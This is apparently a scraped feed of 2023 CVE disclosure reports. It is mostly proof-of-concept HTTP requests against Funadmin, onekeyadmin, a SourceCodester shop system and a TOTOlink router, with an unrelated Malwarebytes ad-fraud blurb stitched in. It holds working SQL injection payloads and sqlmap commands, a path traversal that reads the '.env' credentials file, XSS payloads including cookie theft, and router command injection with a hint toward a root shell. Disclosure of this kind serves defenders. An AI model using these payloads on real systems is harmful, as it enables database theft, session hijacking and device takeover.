Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#list method  
  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
\`POST /databases/table/list?id='+UNION+ALL+SELECT+NULL,CONCAT(0x7162626b71,user(),0x71766a6b71),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`

CVE-2023-24777: Database management plug-in table.php list-sql injection vulnerability · Issue #5 · funadmin/funadmin

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#edit method  
  
Get the id directly and splice it into the sql statement  
Vulnerability recurrence  
Conditions: background administrator rights  
sqlmap poc save as txt

\`POST /databases/database/edit?id=fun\_addon\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420;  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24782: Database management plug-in database.php edit-sql registration vulnerability · Issue #3 · funadmin/funadmin

onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.

Vulnerability affects product:onekeyadmin  
Vulnerability affects version 1.3.9  
Vulnerability type:file reading  
Vulnerability Details：  
Vulnerability location  
app\\admin\\controller\\Curd#code Here the file\_get\_contents function is called without any filtering  

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence  
Here we read the database configuration file .env in the root directory

poc  
\`POST /admin1/curd/code HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 59  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/curd/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"name":"test","title":"test","cover":"../.env","table":\[\]}\`  

You can see that the file was successfully written to our menu.png, causing any file to be read  
http://192.168.3.129:8091/plugins/test/menu.png

CVE-2023-26956: Background development assistant arbitrary file reading vulnerability · Issue #4 · keheying/onekeyadmin

A vulnerability classified as problematic was found in SourceCodester Phone Shop Sales Managements System 1.0. This vulnerability affects unknown code of the file /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php of the component CAPTCHA Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-222598 is the identifier assigned to this vulnerability.

Permalink

Cannot retrieve contributors at this time

**Phone Shop Sales Managements System v1.0 has Cross-site scripting (reflected)**

BUG\_Author: Blair

Source code website address：https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html

Vulnerability File: /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php

Payload1:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(1111)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(1111)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=6fcav63hl60icb4n7tsvv0ns5k
    Connection: close
    

Payload2:http://localhost/osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/"><script>alert(document.cookie)</script>?captcha=1&submit=Check

    GET /osms/assets/plugins/jquery-validation-1.11.1/demo/captcha/index.php/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E?captcha=1&submit=Check HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close

CVE-2023-1275: bug_report/XSS-1.md at main · blairting/bug_report

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/list.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in database.php list-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  

Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\Database.php#list method  
  
  
Get the id directly and splice it into the sql statement

Vulnerability reproduction:  
Background administrator rights  
sqlmap poc save as txt  
\`POST /databases/database/list?id=\* HTTP/1.1  
Host: 192.168.3.129:8092  
Content-Length: 187  
Accept: application/json, text/javascript, _/_; q=0.01  
X-Requested-With: XMLHttpRequest  
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://192.168.3.129:8092  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: Hm\_lvt\_ce074243117e698438c49cd037b593eb=1673498041; ci\_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think\_lang=zh-cn; Hm\_lvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm\_lpvt\_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth\_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound\_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D  
Connection: close

TABLE\_NAME=fun\_addon&ENGINE=InnoDB&TABLE\_COMMENT=%E5%85%AC%E7%94%A8\_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE\_ROWS=7&TABLE\_COLLATION=utf8mb4\_unicode\_ci&**token**\=d659d1ffb4e68ff1910c1c7c75a43539\`  
python sqlmap.py -r poc.txt

CVE-2023-24773: Database management plug-in database.php list-sql injection vulnerability · Issue #4 · funadmin/funadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Menu module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    url  
    http://192.168.3.129:8091/admin1#adminMenu/index

poc  
POST /admin1/adminMenu/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 145  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/adminMenu/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","icon":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"sort":0,"path":"test","ifshow":1,"logwriting":1,"theme":"template"}  

then you can view xss in url  
http://192.168.3.129:8091/admin1#adminMenu/index

CVE-2023-26952: Background menu rules - add menu has storage xss vulnerability · Issue #7 · keheying/onekeyadmin

TOTOlink A7100RU V7.4cu.2313_B20191024 router has a command injection vulnerability.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取ou参数下的内容传递给v14，之后将v14带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"ou":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-25395: ttt/22 at main · Am1ngl/ttt

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Title parameter under the Adding Categories module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#catalog/index

poc POST /admin1/catalog/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 334 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/catalog/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"cover":"","title":"test<img src=1 onerror=alert("xss");>","pid":0,"show":1,"type":"page","seo\_url":"test","bind\_html":"","group\_id":\[\],"links\_type":0,"links\_value":{},"sort":0,"id":"","status":1,"mobile":1,"blank":0,"description":"","content":"","seo\_title":"","seo\_keywords":"","seo\_description":"","field":\[\],"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#catalog/index

CVE-2023-26950: Background category management - adding categories has a storage xss vulnerability · Issue #9 · keheying/onekeyadmin

Categories: Threat Intelligence
A network of online video streaming sites are monetizing traffic with hidden ads. The problem? Advertisers are throwing up to a million dollars every month down the drain as nobody is even seeing the ads.



(Read more...)




The post DeepStreamer: Illegal movie streaming platforms hide lucrative ad fraud operation appeared first on Malwarebytes Labs.

DeepStreamer: Illegal movie streaming platforms hide lucrative ad fraud operation

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/columns.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
Database management plug-in table.php columns-sql injection vulnerability  
Vulnerability occurs in plugin - database management plugin  
  
Code Audit Process  
Vulnerability occurs in  
app\\databases\\controller\\table.php#columns method  
  

Get the id directly and splice it into the sql statement

Vulnerability recurrence  
sqlmap poc save as txt  
GET /databases/table/columns?id=* HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close  
python sqlmap.py -r poc.txt  
  
GET /databases/table/columns?id='+AND+GTID_SUBSET(CONCAT(0x12,(SELECT+(ELT(6415=6415,1))),user()),6415)--+qRTY HTTP/1.1 Host: 192.168.3.129:8092 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close

Tag

#chrome